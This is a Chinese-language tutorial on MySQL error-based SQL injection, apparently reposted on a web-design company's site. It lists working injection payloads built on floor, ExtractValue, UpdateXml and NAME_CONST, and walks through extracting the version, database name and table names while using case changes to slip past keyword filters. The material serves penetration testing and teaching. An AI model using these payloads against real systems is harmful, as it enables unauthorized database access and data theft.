SQL注入之mysql顯錯(cuò)注入
在我們實(shí)際***中,明明發(fā)現(xiàn)一個(gè)注入點(diǎn),本以為丟給sqlmap就可以了,結(jié)果sqlmap只顯示確實(shí)是注入點(diǎn),但是數(shù)據(jù)庫(kù)卻獲取不了,如圖1所示,這時(shí)我們可以使用手工進(jìn)行注入,判斷出過(guò)濾規(guī)則以及基本過(guò)濾情況,然后再選擇對(duì)應(yīng)的sqlmap腳本(如果有的話),本文主要是講述如何通過(guò)MySQL函數(shù)報(bào)錯(cuò)來(lái)進(jìn)行注入,另外如何使用手工進(jìn)行全程注入的利用過(guò)程,如果你知道sqlmap里面有對(duì)應(yīng)的腳本的話,煩請(qǐng)告知一下,謝謝!。
創(chuàng)新互聯(lián)公司長(zhǎng)期為千余家客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù);打造開(kāi)放共贏平臺(tái),與合作伙伴共同營(yíng)造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為汝州企業(yè)提供專業(yè)的成都網(wǎng)站建設(shè)、網(wǎng)站建設(shè),汝州網(wǎng)站改版等技術(shù)服務(wù)。擁有十年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開(kāi)發(fā)。
圖1 獲取數(shù)據(jù)庫(kù)失敗
此時(shí)我們可以考慮下是否是顯錯(cuò)注入,對(duì)于顯錯(cuò)注入我們可以使用mysql顯錯(cuò)注入函數(shù)進(jìn)行查詢數(shù)據(jù)庫(kù)信息。
通過(guò)floor報(bào)錯(cuò):
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select count(*) from (select 1 union select null union select !1)x group by concat((select version()),floor(rand(0)*2)))
通過(guò)ExtractValue報(bào)錯(cuò):
and extractvalue(1, concat(0x7f, (select version()),0x7f))
通過(guò)UpdateXml報(bào)錯(cuò):
and 1=(updatexml(1,concat(0x7f,(select version()),0x7f),1))
通過(guò)NAME_CONST報(bào)錯(cuò):
and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)
通過(guò)錯(cuò)誤的雙重查詢:
or 1 group by concat_ws(0x7f,version(),floor(rand(0)*2)) having min(0) or 1
在這里我們以UpdateXml報(bào)錯(cuò)進(jìn)行實(shí)戰(zhàn)演示,如圖2是一個(gè)顯錯(cuò)注入點(diǎn)。
圖2 顯錯(cuò)注入點(diǎn)
此時(shí)我們將通過(guò)UpdateXml來(lái)進(jìn)行SQL注入,這里由于對(duì)關(guān)鍵字進(jìn)行了過(guò)濾,因此我們需要使用大小寫來(lái)進(jìn)行繞過(guò),首先我們查詢數(shù)據(jù)庫(kù)版本,如圖3所示,成功獲取了數(shù)據(jù)庫(kù)版本。
圖3 獲取數(shù)據(jù)庫(kù)版本信息
獲取數(shù)據(jù)庫(kù)名,如圖4所示。
圖4 獲取數(shù)據(jù)名
獲取表名,如圖5所示。
圖5 獲取表名
后續(xù)操作請(qǐng)參考文章《mysql手工注入》,這里不再進(jìn)行累贅!
新聞名稱:SQL注入之mysql顯錯(cuò)注入
URL地址:http://chinadenli.net/article38/ipchpp.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供響應(yīng)式網(wǎng)站、Google、網(wǎng)站導(dǎo)航、品牌網(wǎng)站建設(shè)、商城網(wǎng)站、網(wǎng)站制作
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)
- 為什么企業(yè)要把傳統(tǒng)網(wǎng)站改版成廣州高端網(wǎng)站制作? 2022-12-09
- 網(wǎng)站建設(shè)之網(wǎng)站改版如何保持排名 2017-02-01
- 網(wǎng)站改版之后都需要注意哪些問(wèn)題? 2020-05-03
- 網(wǎng)站改版是否真的會(huì)導(dǎo)致網(wǎng)站降權(quán)被K? 2023-03-14
- 成都企業(yè)網(wǎng)站改版后續(xù)跟進(jìn)要點(diǎn)分析 2023-03-26
- 網(wǎng)站改版方案要如何制定 2021-05-18
- 北京網(wǎng)站建設(shè)之網(wǎng)站改版會(huì)影響到網(wǎng)站的排名嗎? 2021-06-06
- 企業(yè)網(wǎng)站改版設(shè)計(jì)包含哪些內(nèi)容 2020-07-21
- 網(wǎng)站改版時(shí)會(huì)面臨什么問(wèn)題?-網(wǎng)站建設(shè)創(chuàng)新互聯(lián)科技 2021-11-16
- SEO網(wǎng)站改版如何減少影響? 2013-07-17
- 網(wǎng)站改版后,應(yīng)注意哪些問(wèn)題 2022-07-14
- 網(wǎng)站改版設(shè)計(jì)如何改善原地踏步的訪問(wèn)量 2022-10-28